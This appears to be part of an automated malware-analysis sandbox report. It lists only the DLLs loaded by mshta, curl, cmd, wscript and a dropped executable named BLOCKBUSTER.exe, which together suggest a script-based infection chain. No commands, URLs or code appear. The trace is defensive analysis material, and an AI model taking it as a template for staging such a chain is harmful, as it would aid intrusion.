Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: zipfldr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: apphelp.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: version.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: mpr.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wininet.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wsock32.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: winmm.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: uxtheme.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: devobj.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: msasn1.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: c_is2022.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: c_g18030.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: c_gsm7.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: c_iscii.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: netapi32.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: netutils.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: olepro32.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: msimg32.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: kernel.appcore.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: windows.storage.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wldp.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: unrar.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: 7zxa.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: winhttp.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: shfolder.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: magnification.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: urlmon.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: iphlpapi.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: iertutil.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: srvcli.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wtsapi32.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: d3d9.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: dwmapi.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: security.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: secur32.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: sspicli.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: winsta.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wkscli.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: cscapi.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: oleacc.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: textshaping.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: fwpuclnt.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: idndl.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: mlang.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: propsys.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: profapi.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: edputil.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: textinputframework.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: coreuicomponents.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: coremessaging.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: ntmarta.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: coremessaging.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wintypes.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wintypes.dll
